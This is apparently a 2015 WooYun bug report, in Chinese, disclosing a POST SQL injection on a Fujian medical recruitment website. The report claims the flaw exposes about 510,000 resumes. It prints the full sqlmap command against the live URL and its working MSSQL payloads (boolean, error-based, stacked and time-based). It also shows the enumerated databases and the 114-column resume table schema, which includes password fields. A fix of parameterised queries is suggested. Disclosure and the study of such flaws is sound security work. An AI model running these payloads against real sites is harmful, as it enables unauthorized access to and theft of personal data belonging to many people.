当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145002

漏洞标题:福建医药人才网POST注入可泄露50W份简历(太多详细信息)

相关厂商:福建医药人才网

漏洞作者: 路人甲

提交时间:2015-10-06 12:56

修复时间:2015-11-20 12:58

公开时间:2015-11-20 12:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

福建省医疗人才服务中心(福建省医药人才网—www.fjyyrc.cn) 属于福建省食品药品监督管理局的人才就业服务单位,自2002年成立以来,已为20多万医药卫生相关人才进行全交流国性交流,超过1万家医药卫生单位通过福建省医药人才网进行招聘,并已取得良好的效果。
注入位置:

http://www.fjyyrc.com/vipcxchk.asp


sqlmap.py -u "http://www.fjyyrc.com/vipcxchk.asp" --data "zt=88952634" --level 3 --risk 3 
POST parameter 'zt' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection point(s) with a total of 165 HTTP(s) r
equests:
---
Parameter: zt (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: zt=-8890' OR 1027=1027 AND 'WqRH'='WqRH
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: zt=88952634' AND 7490=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(
106)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (7490=7490) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'OMUT'='OMUT
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: zt=88952634';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: zt=88952634' AND 6112=(SELECT COUNT(*) FROM sysusers AS sys1,sysuse
rs AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,s
ysusers AS sys7) AND 'ccxw'='ccxw
---
[00:39:53] [INFO] testing Microsoft SQL Server
[00:39:54] [INFO] confirming Microsoft SQL Server
[00:39:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[00:39:57] [INFO] fetching database names
[00:39:57] [INFO] the SQL query used returns 5 entries
[00:39:58] [INFO] retrieved: master
[00:39:58] [INFO] retrieved: model
[00:40:01] [INFO] retrieved: msdb
[00:40:01] [INFO] retrieved: tempdb
[00:40:01] [INFO] retrieved: webfjyyrc
available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] webfjyyrc

漏洞证明:

数据库:

fjyyrc5个数据库.png


数据量,51W份简历呢:

fjyyrc主库51万用户.png


简历详细信息:

Database: webfjyyrc
Table: person66
[114 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| administrator      | bit           |
| age                | tinyint       |
| availNotice        | nvarchar      |
| availOpts          | tinyint       |
| beizhu             | ntext         |
| birthday           | tinyint       |
| birthmonth         | tinyint       |
| birthyear          | smallint      |
| comid              | nvarchar      |
| daiyuyaoqiu        | nvarchar      |
| dianaLevel         | tinyint       |
| dianhua            | nvarchar      |
| dlcs               | int           |
| dlsj               | smalldatetime |
| fazhanfangxiang    | ntext         |
| gerenzhuye         | nvarchar      |
| grtype             | tinyint       |
| huji               | char          |
| huji1              | nvarchar      |
| hunyin             | tinyint       |
| id                 | int           |
| ip                 | nvarchar      |
| JFbirthday         | nvarchar      |
| JFcomName          | nvarchar      |
| JFcomSort          | nvarchar      |
| JFcomTar           | nvarchar      |
| JFdaiyu            | nvarchar      |
| JFdianhua          | nvarchar      |
| JFdizhi            | nvarchar      |
| JFdrzw             | nvarchar      |
| JFeduTime          | nvarchar      |
| JFeng              | nvarchar      |
| JFetc              | ntext         |
| JFetcJN            | ntext         |
| JFetclan1          | nvarchar      |
| JFetclan2          | nvarchar      |
| JFetcReq           | ntext         |
| JFgzjy             | ntext         |
| JFgzms             | ntext         |
| JFhkszd            | nvarchar      |
| JFhuji             | nvarchar      |
| JFhunyin           | nvarchar      |
| JFid               | int           |
| JFjobid1           | nvarchar      |
| JFjobid2           | nvarchar      |
| JFjsj              | ntext         |
| JFjsj0             | ntext         |
| JFlan              | nvarchar      |
| JFlzyy             | ntext         |
| JFmqszd            | nvarchar      |
| JFqq               | nvarchar      |
| JFsex              | nvarchar      |
| JFshengao          | nvarchar      |
| JFview             | tinyint       |
| JFxqzw             | nvarchar      |
| JFxueli            | nvarchar      |
| JFxueli2           | nvarchar      |
| JFxwdq             | nvarchar      |
| JFxwgw             | nvarchar      |
| JFzhengshu         | nvarchar      |
| JFzhicheng         | nvarchar      |
| jiaoyubeijing      | ntext         |
| jinengzhuanchang   | ntext         |
| jingyan            | tinyint       |
| jingyanshuoming    | ntext         |
| jlbm               | bit           |
| jobid              | varchar       |
| jsjshuiping        | tinyint       |
| l_OneAbility       | tinyint       |
| l_twoAbility       | tinyint       |
| language_one       | tinyint       |
| language_two       | tinyint       |
| llcs               | int           |
| lxbm               | bit           |
| mandarinLevel      | tinyint       |
| mbsys              | tinyint       |
| minzu              | char          |
| name               | char          |
| Negotiable         | tinyint       |
| otherLanguage      | varchar       |
| password           | nvarchar      |
| password2          | nvarchar      |
| photo              | char          |
| photopb            | tinyint       |
| phototre           | tinyint       |
| pingjia            | ntext         |
| pr                 | int           |
| provideHouseNeeded | tinyint       |
| qq                 | nvarchar      |
| s_PWL1             | nvarchar      |
| s_PWL2             | char          |
| s_PWL3             | char          |
| selectedjob1       | nvarchar      |
| shengao            | smallint      |
| tj                 | tinyint       |
| tjr                | nvarchar      |
| useremail          | nvarchar      |
| username           | nvarchar      |
| workdata           | smallint      |
| worktype           | tinyint       |
| x_suozaidi         | char          |
| x_suozaidi1        | nvarchar      |
| xgsj               | smalldatetime |
| xingbie            | bit           |
| xueli              | tinyint       |
| xuexiao            | nvarchar      |
| yanzheng           | tinyint       |
| zazhi              | bit           |
| zcdata             | smalldatetime |
| zhengshu1          | char          |
| zhengshu2          | char          |
| zhengshu3          | char          |
| zhengshutre        | tinyint       |
| zhuanye            | nvarchar      |
+--------------------+---------------+


dba权限,当前是sa:

fjyyrc-sa-dba.png

修复方案:

参数化查询

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评价